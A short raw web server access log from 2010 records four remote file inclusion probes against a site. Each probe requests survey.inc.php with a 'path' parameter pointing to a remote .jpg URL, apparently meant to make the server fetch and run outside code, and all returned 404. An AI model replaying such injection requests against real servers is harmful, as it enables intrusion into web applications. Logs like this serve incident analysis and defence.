81.176.226.164 - - [11/Feb/2010:07:50:19 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:50:19 -0800] "GET /logs/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [11/Feb/2010:07:50:19 -0800] "GET /surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
151.1.253.1 - - [11/Feb/2010:07:50:28 -0800] "GET /logs/access_100201.log/surveys/survey.inc.php?path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
